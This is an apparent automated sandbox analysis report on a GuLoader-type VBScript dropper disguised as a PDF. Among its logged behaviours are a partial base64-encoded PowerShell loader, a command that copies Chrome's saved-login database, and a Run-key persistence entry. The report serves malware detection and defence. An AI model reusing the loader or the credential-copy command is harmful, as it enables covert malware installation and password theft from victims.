Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB596E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_1EB596E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A20 NtResumeThread,LdrInitializeThunk, 24_2_1EB59A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A00 NtProtectVirtualMemory,LdrInitializeThunk, 24_2_1EB59A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59660 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_1EB59660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A50 NtCreateFile,LdrInitializeThunk, 24_2_1EB59A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB597A0 NtUnmapViewOfSection,LdrInitializeThunk, 24_2_1EB597A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59780 NtMapViewOfSection,LdrInitializeThunk, 24_2_1EB59780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59710 NtQueryInformationToken,LdrInitializeThunk, 24_2_1EB59710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB598F0 NtReadVirtualMemory,LdrInitializeThunk, 24_2_1EB598F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59860 NtQuerySystemInformation,LdrInitializeThunk, 24_2_1EB59860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59840 NtDelayExecution,LdrInitializeThunk, 24_2_1EB59840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB599A0 NtCreateSection,LdrInitializeThunk, 24_2_1EB599A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59910 NtAdjustPrivilegesToken,LdrInitializeThunk, 24_2_1EB59910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59540 NtReadFile,LdrInitializeThunk, 24_2_1EB59540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A80 NtOpenDirectoryObject, 24_2_1EB59A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB596D0 NtCreateKey, 24_2_1EB596D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59610 NtEnumerateValueKey, 24_2_1EB59610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A10 NtQuerySection, 24_2_1EB59A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59670 NtQueryInformationProcess, 24_2_1EB59670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59650 NtQueryValueKey, 24_2_1EB59650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5A3B0 NtGetContextThread, 24_2_1EB5A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59FE0 NtCreateMutant, 24_2_1EB59FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59730 NtQueryVirtualMemory, 24_2_1EB59730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5A710 NtOpenProcessToken, 24_2_1EB5A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59B00 NtSetValueKey, 24_2_1EB59B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59770 NtSetInformationFile, 24_2_1EB59770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5A770 NtOpenThread, 24_2_1EB5A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59760 NtOpenProcess, 24_2_1EB59760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB598A0 NtWriteVirtualMemory, 24_2_1EB598A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59820 NtEnumerateKey, 24_2_1EB59820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5B040 NtSuspendThread, 24_2_1EB5B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB595F0 NtQueryInformationFile, 24_2_1EB595F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB599D0 NtCreateProcessEx, 24_2_1EB599D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB595D0 NtClose, 24_2_1EB595D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5AD30 NtSetContextThread, 24_2_1EB5AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59520 NtWaitForSingleObject, 24_2_1EB59520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59560 NtWriteFile, 24_2_1EB59560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59950 NtQueueApcThread, 24_2_1EB59950
Java / VBScript file with very long strings (likely obfuscated code)
Source: Wire-84844663637346665.PDF.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: usermgrproxy.dll Jump to behavior
Source: Wire-84844663637346665.PDF.vbs ReversingLabs: Detection: 11%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Wire-84844663637346665.PDF.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES843C.tmp" "c:\Users\user\AppData\Local\Temp\lmt3yvf4\CSC3B7445246D634A3891EBDF5913136B1.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown Process created: C:\Windows\System32\smartscreen.exe C:\Windows\System32\smartscreen.exe -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES843C.tmp" "c:\Users\user\AppData\Local\Temp\lmt3yvf4\CSC3B7445246D634A3891EBDF5913136B1.TMP" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220121 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\myste.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@20/16@2/1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\smartscreen.exe Mutant created: \Sessions\1\BaseNamedObjects\Microsoft-Windows-Safety-SmartScreen
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1692:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Wire-84844663637346665.PDF.vbs"
Source: C:\Windows\SysWOW64\help.exe File written: C:\Users\user\AppData\Roaming\N6AQ8R9T\N6Alogri.ini Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 00000021.00000000.897631376.000000000834F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: explorer.exe, 00000021.00000000.897631376.000000000834F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000018.00000002.782255727.000000001EAF0000.00000040.00000001.sdmp, ieinstal.exe, 00000018.00000002.782669035.000000001EC0F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000018.00000002.782255727.000000001EAF0000.00000040.00000001.sdmp, ieinstal.exe, 00000018.00000002.782669035.000000001EC0F000.00000040.00000001.sdmp
Source: Binary string: help.pdbGCTL source: ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777312108.00000000028D0000.00000040.00020000.sdmp
Source: Binary string: help.pdb source: ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777312108.00000000028D0000.00000040.00020000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBCAGEAYwBvAG4AZwAgA", "", "", "0")
Yara detected GuLoader
Source: Yara match File source: 00000018.00000000.651802861.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.728781659.00000000094A0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07896930 push es; ret 17_2_07896940
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB6D0D1 push ecx; ret 24_2_1EB6D0E4
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline Jump to behavior

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.dll Jump to dropped file
Source: C:\Windows\SysWOW64\help.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run C6QLL45HGVE Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run C6QLL45HGVE Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.vbs Static PE information: Wire-84844663637346665.PDF.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
